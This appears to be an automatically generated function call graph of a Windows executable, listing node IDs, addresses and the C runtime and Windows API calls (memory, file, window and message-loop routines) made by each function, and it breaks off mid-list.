__init_pointers 85088->85090 85089->85051 85173 418151 InitializeCriticalSectionAndSpinCount 85090->85173 85092 417d91 85181 4178ff 49 API calls _free 85092->85181 85094 417d2a 85094->85092 85174 416b49 85094->85174 85097 417d76 85180 41793c 46 API calls 4 library calls 85097->85180 85099 417d7e GetCurrentThreadId 85099->85089 85101 416b49 __calloc_crt 46 API calls 85100->85101 85102 41aabf 85101->85102 85102->85102 85105 416b49 __calloc_crt 46 API calls 85102->85105 85106 4164f7 85102->85106 85108 41abb4 85102->85108 85109 41ac34 85102->85109 85103 41ac6a GetStdHandle 85103->85109 85104 41acce SetHandleCount 85104->85106 85105->85102 85106->85056 85166 411924 46 API calls 3 library calls 85106->85166 85107 41ac7c GetFileType 85107->85109 85108->85109 85110 41abe0 GetFileType 85108->85110 85111 41abeb InitializeCriticalSectionAndSpinCount 85108->85111 85109->85103 85109->85104 85109->85107 85112 41aca2 InitializeCriticalSectionAndSpinCount 85109->85112 85110->85108 85110->85111 85111->85106 85111->85108 85112->85106 85112->85109 85114 41f595 85113->85114 85115 41f599 85113->85115 85114->85060 85191 416b04 85115->85191 85117 41f5bb _memmove 85118 41f5c2 FreeEnvironmentStringsW 85117->85118 85118->85060 85120 41f50b _wparse_cmdline 85119->85120 85121 416b04 __malloc_crt 46 API calls 85120->85121 85122 41f54e _wparse_cmdline 85120->85122 85121->85122 85122->85062 85124 41f2bc _wcslen 85123->85124 85128 41f2b4 85123->85128 85125 416b49 __calloc_crt 46 API calls 85124->85125 85130 41f2e0 _wcslen 85125->85130 85126 41f336 85198 413748 85126->85198 85128->85066 85129 416b49 __calloc_crt 46 API calls 85129->85130 85130->85126 85130->85128 85130->85129 85131 41f35c 85130->85131 85134 41f373 85130->85134 85197 41ef12 46 API calls __commit 85130->85197 85132 413748 _free 46 API calls 85131->85132 85132->85128 85204 417ed3 85134->85204 85136 41f37f 85136->85066 85138 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 85137->85138 85140 411750 __IsNonwritableInCurrentImage 85138->85140 85223 41130a 51 API calls __cinit 85138->85223 85140->85070 85142 42e2f3 85141->85142 85143 40d6cc 85141->85143 85224 408f40 85143->85224 85145 40d707 85228 40ebb0 85145->85228 85148 40d737 85231 411951 85148->85231 85153 40d751 85243 40f4e0 SystemParametersInfoW SystemParametersInfoW 85153->85243 85155 40d75f 85244 40d590 GetCurrentDirectoryW 85155->85244 85157 40d767 SystemParametersInfoW 85158 40d794 85157->85158 85159 40d78d FreeLibrary 85157->85159 85160 408f40 VariantClear 85158->85160 85159->85158 85161 40d79d 85160->85161 85162 408f40 VariantClear 85161->85162 85163 40d7a6 85162->85163 85163->85075 85170 4118da 46 API calls _doexit 85163->85170 85164->85048 85165->85052 85170->85075 85171->85078 85172->85087 85173->85094 85176 416b52 85174->85176 85177 416b8f 85176->85177 85178 416b70 Sleep 85176->85178 85182 41f677 85176->85182 85177->85092 85177->85097 85179 416b85 85178->85179 85179->85176 85179->85177 85180->85099 85181->85089 85183 41f683 85182->85183 85187 41f69e _malloc 85182->85187 85184 41f68f 85183->85184 85183->85187 85190 417f77 46 API calls __getptd_noexit 85184->85190 85185 41f6b1 HeapAlloc 85185->85187 85189 41f6d8 85185->85189 85187->85185 85187->85189 85188 41f694 85188->85176 85189->85176 85190->85188 85194 416b0d 85191->85194 85192 4135bb _malloc 45 API calls 85192->85194 85193 416b43 85193->85117 85194->85192 85194->85193 85195 416b24 Sleep 85194->85195 85196 416b39 85195->85196 85196->85193 85196->85194 85197->85130 85199 41377c __dosmaperr 85198->85199 85200 413753 RtlFreeHeap 85198->85200 85199->85128 85200->85199 85201 413768 85200->85201 85207 417f77 46 API calls __getptd_noexit 85201->85207 85203 41376e GetLastError 85203->85199 85208 417daa 85204->85208 85207->85203 85209 417dc9 __cftof2_l __call_reportfault 85208->85209 85210 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 85209->85210 85213 417eb5 __call_reportfault 85210->85213 85212 417ed1 GetCurrentProcess TerminateProcess 85212->85136 85214 41a208 85213->85214 85215 41a210 85214->85215 85216 41a212 IsDebuggerPresent 85214->85216 85215->85212 85222 41fe19 85216->85222 85219 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 85220 421ff8 GetCurrentProcess TerminateProcess 85219->85220 85221 421ff0 __call_reportfault 85219->85221 85220->85212 85221->85220 85222->85219 85223->85140 85225 408f48 moneypunct 85224->85225 85226 4265c7 VariantClear 85225->85226 85227 408f55 moneypunct 85225->85227 85226->85227 85227->85145 85284 40ebd0 85228->85284 85288 4182cb 85231->85288 85233 41195e 85295 4181f2 LeaveCriticalSection 85233->85295 85235 40d748 85236 4119b0 85235->85236 85237 4119d6 85236->85237 85238 4119bc 85236->85238 85237->85153 85238->85237 85330 417f77 46 API calls __getptd_noexit 85238->85330 85240 4119c6 85331 417f25 10 API calls __commit 85240->85331 85242 4119d1 85242->85153 85243->85155 85332 401f20 85244->85332 85246 40d5b6 IsDebuggerPresent 85247 40d5c4 85246->85247 85248 42e1bb MessageBoxA 85246->85248 85249 42e1d4 85247->85249 85250 40d5e3 85247->85250 85248->85249 85505 403a50 52 API calls 3 library calls 85249->85505 85402 40f520 85250->85402 85254 40d5fd GetFullPathNameW 85414 401460 85254->85414 85256 40d63b 85257 40d643 85256->85257 85258 42e231 SetCurrentDirectoryW 85256->85258 85259 40d64c 85257->85259 85506 432fee 6 API calls 85257->85506 85258->85257 85429 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85259->85429 85262 42e252 85262->85259 85264 42e25a GetModuleFileNameW 85262->85264 85267 42e274 85264->85267 85268 42e2cb GetForegroundWindow ShellExecuteW 85264->85268 85266 40d656 85269 40d669 85266->85269 85503 40e0c0 74 API calls __cftof2_l 85266->85503 85507 401b10 85267->85507 85270 40d688 85268->85270 85437 4091e0 85269->85437 85277 40d692 SetCurrentDirectoryW 85270->85277 85277->85157 85278 42e28d 85514 40d200 52 API calls 2 library calls 85278->85514 85281 42e299 GetForegroundWindow ShellExecuteW 85282 42e2c6 85281->85282 85282->85270 85283 40ec00 LoadLibraryA GetProcAddress 85283->85148 85285 40d72e 85284->85285 85286 40ebd6 LoadLibraryA 85284->85286 85285->85148 85285->85283 85286->85285 85287 40ebe7 GetProcAddress 85286->85287 85287->85285 85289 4182e0 85288->85289 85290 4182f3 EnterCriticalSection 85288->85290 85296 418209 85289->85296 85290->85233 85292 4182e6 85292->85290 85323 411924 46 API calls 3 library calls 85292->85323 85295->85235 85297 418215 __commit 85296->85297 85298 418225 85297->85298 85299 41823d 85297->85299 85324 418901 46 API calls 2 library calls 85298->85324 85302 416b04 __malloc_crt 45 API calls 85299->85302 85305 41824b __commit 85299->85305 85301 41822a 85325 418752 46 API calls 8 library calls 85301->85325 85304 418256 85302->85304 85307 41825d 85304->85307 85308 41826c 85304->85308 85305->85292 85306 418231 85326 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 85306->85326 85327 417f77 46 API calls __getptd_noexit 85307->85327 85309 4182cb __lock 45 API calls 85308->85309 85312 418273 85309->85312 85314 4182a6 85312->85314 85315 41827b InitializeCriticalSectionAndSpinCount 85312->85315 85318 413748 _free 45 API calls 85314->85318 85316 418297 85315->85316 85317 41828b 85315->85317 85329 4182c2 LeaveCriticalSection _doexit 85316->85329 85319 413748 _free 45 API calls 85317->85319 85318->85316 85320 418291 85319->85320 85328 417f77 46 API calls __getptd_noexit 85320->85328 85324->85301 85325->85306 85327->85305 85328->85316 85329->85305 85330->85240 85331->85242 85515 40e6e0 85332->85515 85336 401f41 GetModuleFileNameW 85533 410100 85336->85533 85338 401f5c 85545 410960 85338->85545 85341 401b10 52 API calls 85342 401f81 85341->85342 85548 401980 85342->85548 85344 401f8e 85345 408f40 VariantClear 85344->85345 85346 401f9d 85345->85346 85347 401b10 52 API calls 85346->85347 85348 401fb4 85347->85348 85349 401980 53 API calls 85348->85349 85350 401fc3 85349->85350 85351 401b10 52 API calls 85350->85351 85352 401fd2 85351->85352 85556 40c2c0 85352->85556 85354 401fe1 85355 40bc70 52 API calls 85354->85355 85356 401ff3 85355->85356 85574 401a10 85356->85574 85358 401ffe 85581 4114ab 85358->85581 85361 428b05 85363 401a10 52 API calls 85361->85363 85362 402017 85364 4114ab __wcsicoll 58 API calls 85362->85364 85365 428b18 85363->85365 85366 402022 85364->85366 85368 401a10 52 API calls 85365->85368 85366->85365 85367 40202d 85366->85367 85369 4114ab __wcsicoll 58 API calls 85367->85369 85370 428b33 85368->85370 85371 402038 85369->85371 85373 428b3b GetModuleFileNameW 85370->85373 85372 402043 85371->85372 85371->85373 85374 4114ab __wcsicoll 58 API calls 85372->85374 85375 401a10 52 API calls 85373->85375 85376 40204e 85374->85376 85377 428b6c 85375->85377 85378 402092 85376->85378 85382 401a10 52 API calls 85376->85382 85387 428b90 _wcscpy 85376->85387 85379 40e0a0 52 API calls 85377->85379 85381 4020a3 85378->85381 85378->85387 85380 428b7a 85379->85380 85383 401a10 52 API calls 85380->85383 85384 428bc6 85381->85384 85589 40e830 53 API calls 85381->85589 85385 402073 _wcscpy 85382->85385 85386 428b88 85383->85386 85393 401a10 52 API calls 85385->85393 85386->85387 85389 401a10 52 API calls 85387->85389 85397 4020d0 85389->85397 85390 4020bb 85590 40cf00 53 API calls 85390->85590 85392 4020c6 85394 408f40 VariantClear 85392->85394 85393->85378 85394->85397 85395 402110 85399 408f40 VariantClear 85395->85399 85397->85395 85400 401a10 52 API calls 85397->85400 85591 40cf00 53 API calls 85397->85591 85592 40e6a0 53 API calls 85397->85592 85401 402120 moneypunct 85399->85401 85400->85397 85401->85246 85403 4295c9 __cftof2_l 85402->85403 85404 40f53c 85402->85404 85406 4295d9 GetOpenFileNameW 85403->85406 86335 410120 85404->86335 85406->85404 85408 40d5f5 85406->85408 85407 40f545 86339 4102b0 SHGetMalloc 85407->86339 85408->85254 85408->85256 85410 40f54c 86344 410190 GetFullPathNameW 85410->86344 85412 40f559 86355 40f570 85412->86355 86409 402400 85414->86409 85416 40146f 85419 428c29 _wcscat 85416->85419 86418 401500 85416->86418 85418 40147c 85418->85419 86426 40d440 85418->86426 85421 401489 85421->85419 85422 401491 GetFullPathNameW 85421->85422 85423 402160 52 API calls 85422->85423 85424 4014bb 85423->85424 85425 402160 52 API calls 85424->85425 85426 4014c8 85425->85426 85426->85419 85427 402160 52 API calls 85426->85427 85428 4014ee 85427->85428 85428->85256 85430 428361 85429->85430 85431 4103fc LoadImageW RegisterClassExW 85429->85431 86497 44395e EnumResourceNamesW LoadImageW 85430->86497 86496 410490 7 API calls 85431->86496 85434 428368 85435 40d651 85436 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85435->85436 85436->85266 85438 409202 85437->85438 85439 42d7ad 85437->85439 85495 409216 moneypunct 85438->85495 86634 410940 383 API calls 85438->86634 86637 45e737 90 API calls 3 library calls 85439->86637 85442 409386 85443 40939c 85442->85443 86635 40f190 10 API calls 85442->86635 85443->85270 85504 401000 Shell_NotifyIconW __cftof2_l 85443->85504 85445 4095b2 85445->85443 85447 4095bf 85445->85447 85446 409253 PeekMessageW 85446->85495 86636 401a50 383 API calls 85447->86636 85449 42d8cd Sleep 85449->85495 85450 4095c6 LockWindowUpdate DestroyWindow GetMessageW 85450->85443 85453 4095f9 85450->85453 85452 42e13b 86655 40d410 VariantClear 85452->86655 85456 42e158 TranslateMessage DispatchMessageW GetMessageW 85453->85456 85456->85456 85457 42e188 85456->85457 85457->85443 85459 409567 PeekMessageW 85459->85495 85461 46f3c1 107 API calls 85461->85495 85462 40e0a0 52 API calls 85462->85495 85463 46fdbf 108 API calls 85501 4094e0 85463->85501 85465 42dcd2 WaitForSingleObject 85471 42dcf0 GetExitCodeProcess CloseHandle 85465->85471 85465->85495 85466 409551 TranslateMessage DispatchMessageW 85466->85459 85468 44c29d 52 API calls 85468->85501 85469 42dd3d Sleep 85469->85501 85470 47d33e 361 API calls 85470->85495 86644 40d410 VariantClear 85471->86644 85474 4094cf Sleep 85474->85501 85476 42d94d timeGetTime 86640 465124 53 API calls 85476->86640 85478 40d410 VariantClear 85478->85495 85479 40c620 timeGetTime 85479->85501 85481 465124 53 API calls 85481->85501 85483 42dd89 CloseHandle 85483->85501 85485 42de19 GetExitCodeProcess CloseHandle 85485->85501 85486 401b10 52 API calls 85486->85501 85489 42de88 Sleep 85489->85495 85492 45e737 90 API calls 85492->85495 85495->85442 85495->85446 85495->85449 85495->85452 85495->85459 85495->85461 85495->85462 85495->85465 85495->85466 85495->85469 85495->85470 85495->85474 85495->85476 85495->85478 85495->85492 85496 42e0cc VariantClear 85495->85496 85497 408f40 VariantClear 85495->85497 85495->85501 86498 4091b0 85495->86498 86556 40afa0 85495->86556 86582 408fc0 85495->86582 86617 408cc0 85495->86617 86631 4096a0 383 API calls 4 library calls 85495->86631 86632 40d150 TranslateAcceleratorW 85495->86632 86633 40d170 IsDialogMessageW GetClassLongW 85495->86633 86638 465124 53 API calls 85495->86638 86639 40c620 timeGetTime 85495->86639 86654 40e270 VariantClear moneypunct 85495->86654 85496->85495 85497->85495 85499 401980 53 API calls 85499->85501 85501->85463 85501->85468 85501->85479 85501->85481 85501->85483 85501->85485 85501->85486 85501->85489 85501->85495 85501->85499 85502 408f40 VariantClear 85501->85502 86641 45178a 54 API calls 85501->86641 86642 47d33e 383 API calls 85501->86642 86643 453bc6 54 API calls 85501->86643 86645 40d410 VariantClear 85501->86645 86646 443d19 67 API calls _wcslen 85501->86646 86647 4574b4 VariantClear 85501->86647 86648 403cd0 85501->86648 86652 4731e1 VariantClear 85501->86652 86653 4331a2 6 API calls 85501->86653 85502->85501 85503->85269 85504->85270 85505->85256 85506->85262 85508 401b16 _wcslen 85507->85508 85509 4115d7 52 API calls 85508->85509 85512 401b63 85508->85512 85510 401b4b _memmove 85509->85510 85511 4115d7 52 API calls 85510->85511 85511->85512 85513 40d200 52 API calls 2 library calls 85512->85513 85513->85278 85514->85281 85516 40bc70 52 API calls 85515->85516 85517 401f31 85516->85517 85518 402560 85517->85518 85519 40256d __write_nolock 85518->85519 85520 402160 52 API calls 85519->85520 85522 402593 85520->85522 85532 4025bd 85522->85532 85593 401c90 85522->85593 85523 4026f0 52 API calls 85523->85532 85524 4026a7 85525 401b10 52 API calls 85524->85525 85531 4026db 85524->85531 85527 4026d1 85525->85527 85526 401b10 52 API calls 85526->85532 85597 40d7c0 52 API calls 2 library calls 85527->85597 85529 401c90 52 API calls 85529->85532 85531->85336 85532->85523 85532->85524 85532->85526 85532->85529 85596 40d7c0 52 API calls 2 library calls 85532->85596 85598 40f760 85533->85598 85536 410118 85536->85338 85538 42805d 85539 42806a 85538->85539 85654 431e58 85538->85654 85541 413748 _free 46 API calls 85539->85541 85542 428078 85541->85542 85543 431e58 82 API calls 85542->85543 85544 428084 85543->85544 85544->85338 85546 4115d7 52 API calls 85545->85546 85547 401f74 85546->85547 85547->85341 85549 4019a3 85548->85549 85553 401985 85548->85553 85550 4019b8 85549->85550 85549->85553 86324 403e10 53 API calls 85550->86324 85552 40199f 85552->85344 85553->85552 86323 403e10 53 API calls 85553->86323 85555 4019c4 85555->85344 85557 40c2c7 85556->85557 85558 40c30e 85556->85558 85561 40c2d3 85557->85561 85567 426c79 85557->85567 85559 40c315 85558->85559 85560 426c2b 85558->85560 85562 40c321 85559->85562 85566 426c5a 85559->85566 85564 426c4b 85560->85564 85568 426c2e 85560->85568 86325 403ea0 52 API calls __cinit 85561->86325 86326 403ea0 52 API calls __cinit 85562->86326 86328 4534e3 52 API calls 85564->86328 86329 4534e3 52 API calls 85566->86329 86330 4534e3 52 API calls 85567->86330 85573 40c2de 85568->85573 86327 4534e3 52 API calls 85568->86327 85573->85354 85575 401a30 85574->85575 85576 401a17 85574->85576 85578 402160 52 API calls 85575->85578 85577 401a2d 85576->85577 86331 403c30 52 API calls _memmove 85576->86331 85577->85358 85580 401a3d 85578->85580 85580->85358 85582 411523 85581->85582 85583 4114ba 85581->85583 86334 4113a8 58 API calls 3 library calls 85582->86334 85588 40200c 85583->85588 86332 417f77 46 API calls __getptd_noexit 85583->86332 85586 4114c6 86333 417f25 10 API calls __commit 85586->86333 85588->85361 85588->85362 85589->85390 85590->85392 85591->85397 85592->85397 85594 4026f0 52 API calls 85593->85594 85595 401c97 85594->85595 85595->85522 85596->85532 85597->85531 85658 40f6f0 85598->85658 85600 40f77b _strcat moneypunct 85666 40f850 85600->85666 85605 427c2a 85695 414d04 85605->85695 85607 40f7fc 85607->85605 85608 40f804 85607->85608 85682 414a46 85608->85682 85612 40f80e 85612->85536 85617 4528bd 85612->85617 85614 427c59 85701 414fe2 85614->85701 85616 427c79 85618 4150d1 _fseek 81 API calls 85617->85618 85619 452930 85618->85619 86225 452719 85619->86225 85622 452948 85622->85538 85623 414d04 __fread_nolock 61 API calls 85624 452966 85623->85624 85625 414d04 __fread_nolock 61 API calls 85624->85625 85626 452976 85625->85626 85627 414d04 __fread_nolock 61 API calls 85626->85627 85628 45298f 85627->85628 85629 414d04 __fread_nolock 61 API calls 85628->85629 85630 4529aa 85629->85630 85631 4150d1 _fseek 81 API calls 85630->85631 85632 4529c4 85631->85632 85633 4135bb _malloc 46 API calls 85632->85633 85634 4529cf 85633->85634 85635 4135bb _malloc 46 API calls 85634->85635 85636 4529db 85635->85636 85637 414d04 __fread_nolock 61 API calls 85636->85637 85638 4529ec 85637->85638 85639 44afef GetSystemTimeAsFileTime 85638->85639 85640 452a00 85639->85640 85641 452a36 85640->85641 85642 452a13 85640->85642 85643 452aa5 85641->85643 85644 452a3c 85641->85644 85645 413748 _free 46 API calls 85642->85645 85647 413748 _free 46 API calls 85643->85647 86231 44b1a9 85644->86231 85648 452a1c 85645->85648 85650 452aa3 85647->85650 85651 413748 _free 46 API calls 85648->85651 85649 452a9d 85652 413748 _free 46 API calls 85649->85652 85650->85538 85653 452a25 85651->85653 85652->85650 85653->85538 85655 431e64 85654->85655 85656 431e6a 85654->85656 85657 414a46 __fcloseall 82 API calls 85655->85657 85656->85539 85657->85656 85659 425de2 85658->85659 85661 40f6fc _wcslen 85658->85661 85659->85600 85660 40f710 WideCharToMultiByte 85662 40f756 85660->85662 85663 40f728 85660->85663 85661->85660 85662->85600 85664 4115d7 52 API calls 85663->85664 85665 40f735 WideCharToMultiByte 85664->85665 85665->85600 85667 40f85d __cftof2_l _strlen 85666->85667 85669 40f7ab 85667->85669 85714 414db8 85667->85714 85670 4149c2 85669->85670 85729 414904 85670->85729 85672 40f7e9 85672->85605 85673 40f5c0 85672->85673 85674 40f5cd _strcat __write_nolock _memmove 85673->85674 85675 414d04 __fread_nolock 61 API calls 85674->85675 85677 425d11 85674->85677 85681 40f691 __tzset_nolock 85674->85681 85817 4150d1 85674->85817 85675->85674 85678 4150d1 _fseek 81 API calls 85677->85678 85679 425d33 85678->85679 85680 414d04 __fread_nolock 61 API calls 85679->85680 85680->85681 85681->85607 85683 414a52 __commit 85682->85683 85684 414a64 85683->85684 85685 414a79 85683->85685 85981 417f77 46 API calls __getptd_noexit 85684->85981 85687 415471 __lock_file 47 API calls 85685->85687 85691 414a74 __commit 85685->85691 85689 414a92 85687->85689 85688 414a69 85982 417f25 10 API calls __commit 85688->85982 85965 4149d9 85689->85965 85691->85612 86050 414c76 85695->86050 85697 414d1c 85698 44afef 85697->85698 86218 442c5a 85698->86218 85700 44b00d 85700->85614 85702 414fee __commit 85701->85702 85703 414ffa 85702->85703 85704 41500f 85702->85704 86222 417f77 46 API calls __getptd_noexit 85703->86222 85706 415471 __lock_file 47 API calls 85704->85706 85708 415017 85706->85708 85707 414fff 86223 417f25 10 API calls __commit 85707->86223 85709 414e4e __ftell_nolock 51 API calls 85708->85709 85711 415024 85709->85711 86224 41503d LeaveCriticalSection LeaveCriticalSection _fprintf 85711->86224 85713 41500a __commit 85713->85616 85715 414dd6 85714->85715 85716 414deb 85714->85716 85725 417f77 46 API calls __getptd_noexit 85715->85725 85716->85715 85718 414df2 85716->85718 85727 41b91b 79 API calls 12 library calls 85718->85727 85720 414ddb 85726 417f25 10 API calls __commit 85720->85726 85721 414e18 85723 414de6 85721->85723 85728 418f98 77 API calls 7 library calls 85721->85728 85723->85667 85725->85720 85726->85723 85727->85721 85728->85723 85732 414910 __commit 85729->85732 85730 414923 85785 417f77 46 API calls __getptd_noexit 85730->85785 85732->85730 85734 414951 85732->85734 85733 414928 85786 417f25 10 API calls __commit 85733->85786 85748 41d4d1 85734->85748 85737 414956 85738 41496a 85737->85738 85739 41495d 85737->85739 85741 414992 85738->85741 85742 414972 85738->85742 85787 417f77 46 API calls __getptd_noexit 85739->85787 85765 41d218 85741->85765 85788 417f77 46 API calls __getptd_noexit 85742->85788 85743 414933 __commit @_EH4_CallFilterFunc@8 85743->85672 85749 41d4dd __commit 85748->85749 85750 4182cb __lock 46 API calls 85749->85750 85763 41d4eb 85750->85763 85751 41d560 85790 41d5fb 85751->85790 85752 41d567 85753 416b04 __malloc_crt 46 API calls 85752->85753 85755 41d56e 85753->85755 85755->85751 85757 41d57c InitializeCriticalSectionAndSpinCount 85755->85757 85756 41d5f0 __commit 85756->85737 85758 41d59c 85757->85758 85759 41d5af EnterCriticalSection 85757->85759 85762 413748 _free 46 API calls 85758->85762 85759->85751 85760 418209 __mtinitlocknum 46 API calls 85760->85763 85762->85751 85763->85751 85763->85752 85763->85760 85793 4154b2 47 API calls __lock 85763->85793 85794 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85763->85794 85766 41d23a 85765->85766 85767 41d255 85766->85767 85778 41d26c __wopenfile 85766->85778 85799 417f77 46 API calls __getptd_noexit 85767->85799 85769 41d25a 85800 417f25 10 API calls __commit 85769->85800 85770 41d47a 85804 417f77 46 API calls __getptd_noexit 85770->85804 85771 41d48c 85796 422bf9 85771->85796 85775 41d47f 85805 417f25 10 API calls __commit 85775->85805 85776 41499d 85789 4149b8 LeaveCriticalSection LeaveCriticalSection _fprintf 85776->85789 85778->85770 85778->85778 85784 41d421 85778->85784 85801 41341f 58 API calls 2 library calls 85778->85801 85780 41d41a 85780->85784 85802 41341f 58 API calls 2 library calls 85780->85802 85782 41d439 85782->85784 85803 41341f 58 API calls 2 library calls 85782->85803 85784->85770 85784->85771 85785->85733 85786->85743 85787->85743 85788->85743 85789->85743 85795 4181f2 LeaveCriticalSection 85790->85795 85792 41d602 85792->85756 85793->85763 85794->85763 85795->85792 85806 422b35 85796->85806 85798 422c14 85798->85776 85799->85769 85800->85776 85801->85780 85802->85782 85803->85784 85804->85775 85805->85776 85808 422b41 __commit 85806->85808 85807 422b54 85809 417f77 __commit 46 API calls 85807->85809 85808->85807 85810 422b8a 85808->85810 85811 422b59 85809->85811 85813 422400 __tsopen_nolock 109 API calls 85810->85813 85812 417f25 __commit 10 API calls 85811->85812 85816 422b63 __commit 85812->85816 85814 422ba4 85813->85814 85815 422bcb __wsopen_helper LeaveCriticalSection 85814->85815 85815->85816 85816->85798 85819 4150dd __commit 85817->85819 85818 4150e9 85848 417f77 46 API calls __getptd_noexit 85818->85848 85819->85818 85820 41510f 85819->85820 85830 415471 85820->85830 85823 4150ee 85849 417f25 10 API calls __commit 85823->85849 85829 4150f9 __commit 85829->85674 85831 415483 85830->85831 85832 4154a5 EnterCriticalSection 85830->85832 85831->85832 85833 41548b 85831->85833 85835 415117 85832->85835 85834 4182cb __lock 46 API calls 85833->85834 85834->85835 85836 415047 85835->85836 85837 415057 85836->85837 85839 415067 85836->85839 85906 417f77 46 API calls __getptd_noexit 85837->85906 85838 415079 85868 41443c 85838->85868 85839->85838 85851 414e4e 85839->85851 85843 41505c 85850 415143 LeaveCriticalSection LeaveCriticalSection _fprintf 85843->85850 85846 4150b9 85881 41e1f4 85846->85881 85848->85823 85849->85829 85850->85829 85852 414e61 85851->85852 85853 414e79 85851->85853 85907 417f77 46 API calls __getptd_noexit 85852->85907 85855 414139 __fflush_nolock 46 API calls 85853->85855 85857 414e80 85855->85857 85856 414e66 85908 417f25 10 API calls __commit 85856->85908 85859 41e1f4 __write 51 API calls 85857->85859 85860 414e97 85859->85860 85861 414f09 85860->85861 85863 414ec9 85860->85863 85867 414e71 85860->85867 85909 417f77 46 API calls __getptd_noexit 85861->85909 85864 41e1f4 __write 51 API calls 85863->85864 85863->85867 85865 414f64 85864->85865 85866 41e1f4 __write 51 API calls 85865->85866 85865->85867 85866->85867 85867->85838 85869 414477 85868->85869 85870 414455 85868->85870 85874 414139 85869->85874 85870->85869 85871 414139 __fflush_nolock 46 API calls 85870->85871 85872 414470 85871->85872 85910 41b7b2 85872->85910 85875 414145 85874->85875 85876 41415a 85874->85876 85935 417f77 46 API calls __getptd_noexit 85875->85935 85876->85846 85878 41414a 85936 417f25 10 API calls __commit 85878->85936 85880 414155 85880->85846 85882 41e200 __commit 85881->85882 85883 41e223 85882->85883 85884 41e208 85882->85884 85886 41e22f 85883->85886 85890 41e269 85883->85890 85957 417f8a 46 API calls __getptd_noexit 85884->85957 85959 417f8a 46 API calls __getptd_noexit 85886->85959 85888 41e20d 85958 417f77 46 API calls __getptd_noexit 85888->85958 85889 41e234 85960 417f77 46 API calls __getptd_noexit 85889->85960 85937 41ae56 85890->85937 85894 41e23c 85961 417f25 10 API calls __commit 85894->85961 85895 41e26f 85897 41e291 85895->85897 85898 41e27d 85895->85898 85962 417f77 46 API calls __getptd_noexit 85897->85962 85947 41e17f 85898->85947 85899 41e215 __commit 85899->85843 85902 41e296 85963 417f8a 46 API calls __getptd_noexit 85902->85963 85903 41e289 85964 41e2c0 LeaveCriticalSection __unlock_fhandle 85903->85964 85906->85843 85907->85856 85908->85867 85909->85867 85911 41b7be __commit 85910->85911 85912 41b7e1 85911->85912 85913 41b7c6 85911->85913 85915 41b7ed 85912->85915 85918 41b827 85912->85918 85914 417f8a __commit 46 API calls 85913->85914 85916 41b7cb 85914->85916 85917 417f8a __commit 46 API calls 85915->85917 85919 417f77 __commit 46 API calls 85916->85919 85920 41b7f2 85917->85920 85921 41ae56 ___lock_fhandle 48 API calls 85918->85921 85928 41b7d3 __commit 85919->85928 85922 417f77 __commit 46 API calls 85920->85922 85923 41b82d 85921->85923 85924 41b7fa 85922->85924 85926 41b83b 85923->85926 85927 41b84f 85923->85927 85925 417f25 __commit 10 API calls 85924->85925 85925->85928 85929 41b0b5 __write_nolock 74 API calls 85926->85929 85930 417f77 __commit 46 API calls 85927->85930 85928->85869 85931 41b847 85929->85931 85932 41b854 85930->85932 85934 41b87e __write LeaveCriticalSection 85931->85934 85933 417f8a __commit 46 API calls 85932->85933 85933->85931 85934->85928 85935->85878 85936->85880 85938 41ae62 __commit 85937->85938 85939 41aebc 85938->85939 85942 4182cb __lock 46 API calls 85938->85942 85940 41aec1 EnterCriticalSection 85939->85940 85941 41aede __commit 85939->85941 85940->85941 85941->85895 85943 41ae8e 85942->85943 85944 41aeaa 85943->85944 85945 41ae97 InitializeCriticalSectionAndSpinCount 85943->85945 85946 41aeec ___lock_fhandle LeaveCriticalSection 85944->85946 85945->85944 85946->85939 85948 41aded __commit 46 API calls 85947->85948 85949 41e18e 85948->85949 85950 41e1a4 SetFilePointer 85949->85950 85951 41e194 85949->85951 85953 41e1c3 85950->85953 85954 41e1bb GetLastError 85950->85954 85952 417f77 __commit 46 API calls 85951->85952 85955 41e199 85952->85955 85953->85955 85956 417f9d __dosmaperr 46 API calls 85953->85956 85954->85953 85955->85903 85956->85955 85957->85888 85958->85899 85959->85889 85960->85894 85961->85899 85962->85902 85963->85903 85964->85899 85966 4149ea 85965->85966 85967 4149fe 85965->85967 86011 417f77 46 API calls __getptd_noexit 85966->86011 85969 4149fa 85967->85969 85971 41443c __flush 77 API calls 85967->85971 85983 414ab2 LeaveCriticalSection LeaveCriticalSection _fprintf 85969->85983 85970 4149ef 86012 417f25 10 API calls __commit 85970->86012 85973 414a0a 85971->85973 85984 41d8c2 85973->85984 85976 414139 __fflush_nolock 46 API calls 85977 414a18 85976->85977 85988 41d7fe 85977->85988 85979 414a1e 85979->85969 85980 413748 _free 46 API calls 85979->85980 85980->85969 85981->85688 85982->85691 85983->85691 85985 414a12 85984->85985 85986 41d8d2 85984->85986 85985->85976 85986->85985 85987 413748 _free 46 API calls 85986->85987 85987->85985 85989 41d80a __commit 85988->85989 85990 41d812 85989->85990 85991 41d82d 85989->85991 86028 417f8a 46 API calls __getptd_noexit 85990->86028 85993 41d839 85991->85993 85997 41d873 85991->85997 86030 417f8a 46 API calls __getptd_noexit 85993->86030 85995 41d817 86029 417f77 46 API calls __getptd_noexit 85995->86029 85996 41d83e 86031 417f77 46 API calls __getptd_noexit 85996->86031 86000 41ae56 ___lock_fhandle 48 API calls 85997->86000 86002 41d879 86000->86002 86001 41d846 86032 417f25 10 API calls __commit 86001->86032 86004 41d893 86002->86004 86005 41d887 86002->86005 86033 417f77 46 API calls __getptd_noexit 86004->86033 86013 41d762 86005->86013 86006 41d81f __commit 86006->85979 86009 41d88d 86034 41d8ba LeaveCriticalSection __unlock_fhandle 86009->86034 86011->85970 86012->85969 86035 41aded 86013->86035 86015 41d7c8 86048 41ad67 47 API calls __commit 86015->86048 86017 41d772 86017->86015 86018 41d7a6 86017->86018 86019 41aded __commit 46 API calls 86017->86019 86018->86015 86020 41aded __commit 46 API calls 86018->86020 86022 41d79d 86019->86022 86023 41d7b2 CloseHandle 86020->86023 86021 41d7d0 86024 41d7f2 86021->86024 86049 417f9d 46 API calls 2 library calls 86021->86049 86025 41aded __commit 46 API calls 86022->86025 86023->86015 86026 41d7be GetLastError 86023->86026 86024->86009 86025->86018 86026->86015 86028->85995 86029->86006 86030->85996 86031->86001 86032->86006 86033->86009 86034->86006 86036 41ae12 